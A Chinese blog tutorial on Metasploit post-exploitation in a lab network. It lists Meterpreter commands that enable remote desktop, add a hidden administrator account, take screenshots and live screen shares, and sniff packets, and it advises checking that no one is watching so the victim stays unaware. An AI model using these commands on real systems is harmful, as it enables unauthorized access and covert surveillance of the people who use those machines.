当前位置:网站首页>内网渗透之内网信息收集(二)
内网渗透之内网信息收集(二)
2022-07-06 09:23:00 【不知名白帽】
目录
内网渗透之内网信息收集(三)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
05打开并连接3389
查看3389端口的开放情况

开启3389远程桌面
run post/windows/manage/enable_rdp
run getgui -e

可以利用该命令在目标机器上添加用户:
run getgui -u admin -p [email protected](一些系统密码得满足复杂度才能创建)
net localgroup administrators admin /add(将admin用户添加到管理员组)

远程连接桌面
rdesktop -u username -p password ip

yes之后会弹出一个GUI页面(如果用户没有添加到管理员组不能进行登录)

登陆后会提示关闭win7(所以要提前观察靶机是否有人使用,以免被用户察觉到被攻击)

查看远程桌面
screenshot(截取win7当前屏幕,检查是否有人使用)

use espia
screengrab
screenshare(实时获取win7屏幕,类似于视频样式在浏览器中打开)

删除指定账号
run post/windows/manage/delete_user USERNAME=admin
06数据包抓取
抓包
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
解码
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- Reinforcement learning series (I): basic principles and concepts
- The difference between cookies and sessions
- Simply understand the promise of ES6
- "Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
- Tencent map circle
- Experiment five categories and objects
- 实验七 常用类的使用
- 7-1 output all primes between 2 and n (PTA programming)
- 7-4 散列表查找(PTA程序设计)
- 实验四 数组
猜你喜欢

"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?

Ucos-iii learning records (11) - task management

Relationship between hashcode() and equals()

Poker game program - man machine confrontation

SRC挖掘思路及方法

HackMyvm靶机系列(4)-vulny

Hackmyvm Target Series (3) - vues

外网打点(信息收集)

DVWA (5th week)

How to turn wechat applet into uniapp
随机推荐
Canvas foundation 1 - draw a straight line (easy to understand)
Record once, modify password logic vulnerability actual combat
HackMyvm靶机系列(1)-webmaster
1. First knowledge of C language (1)
HackMyvm靶机系列(4)-vulny
Using qcommonstyle to draw custom form parts
Tencent map circle
Hackmyvm target series (3) -visions
xray与burp联动 挖掘
7-8 7104 约瑟夫问题(PTA程序设计)
记一次,修改密码逻辑漏洞实战
Hackmyvm target series (5) -warez
Only 40% of the articles are original? Here comes the modification method
Mixlab unbounded community white paper officially released
7-15 h0161. Find the greatest common divisor and the least common multiple (PTA program design)
7-8 7104 Joseph problem (PTA program design)
7-5 staircase upgrade (PTA program design)
Analysis of penetration test learning and actual combat stage
实验六 继承和多态
The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise